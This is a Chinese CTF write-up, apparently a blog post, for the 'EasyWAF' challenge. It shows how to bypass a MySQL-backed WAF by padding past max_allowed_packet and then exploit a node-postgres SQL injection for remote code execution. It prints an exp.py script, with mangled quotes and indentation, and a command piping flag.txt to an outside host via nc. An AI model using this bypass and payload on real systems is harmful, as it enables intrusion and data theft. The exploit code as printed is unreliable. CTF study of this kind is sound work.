EasyWAF

EasyWAF

访问首页“/”时,发现cookie为node=dGhlcmUgaXMgbm90aGluZ34h,base64解码后结果为“there is nothing~!”。

uploading.4e448015.gif正在上传…重新上传取消

访问接口“/register”时,尝试进行注入,会提示“SQL Injection Attack Found! IP record!”。

正常访问接口“/register”时,返回结果为“IP have recorded!”,同时,发现设置了Cookie为node=bWF4X2FsbG93ZWRfcGFja2V0,base64解码后结果“max_allowed_packet”。

访问“/hint”时,发现cookie为node=fiBub2RlLXBvc3RncmVzIH4h,base64解码后结果为“~ node-postgres ~!”。

进一步进行注入探测,可以知道,过滤了以下字符串:

    "select", 
    "union", 
    "and", 
    "or", 
    "\\", 
    "/", 
    "*", 
    " " 

结合以上两点信息,可以知道此web服务使用nodejs,并且waf数据保存在mysql中,而注册数据保存在postgresql中,同时可以利用mysql的max_allowed_packet特性绕过waf,并结合nodejs postgres包的RCE漏洞进行利用,给出如下exp.py。

from random import randint
import requests
import sys

payload = "union"

def exp(url, cmd):
print(cmd)
payload = “”"’,’’)/%s/returning(1)as"\’/",(1)as"\’/-(a=child_process)/",(2)as"\’/-(b=%s)/",(3)as"\’/-console.log(process.mainModule.require(a).exec(b))]=1//"–""" % (’ ’ * 1024 * 1024 * 16, cmd)
username = str(randint(1, 65535)) + str(randint(1, 65535)) + str(randint(1, 65535))

data = { 'username': username + payload,'password': 'ABCDEF'}
print('ok')
r = requests.post(url, data = data)
print(r.content)

if name == ‘main’:
exp(sys.argv[1], sys.argv[2])

执行“python3 exp.py http://ip:端口/register “cat flag.txt|nc ip 端口””,如下。

远程服务器监听9999端口,获得flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值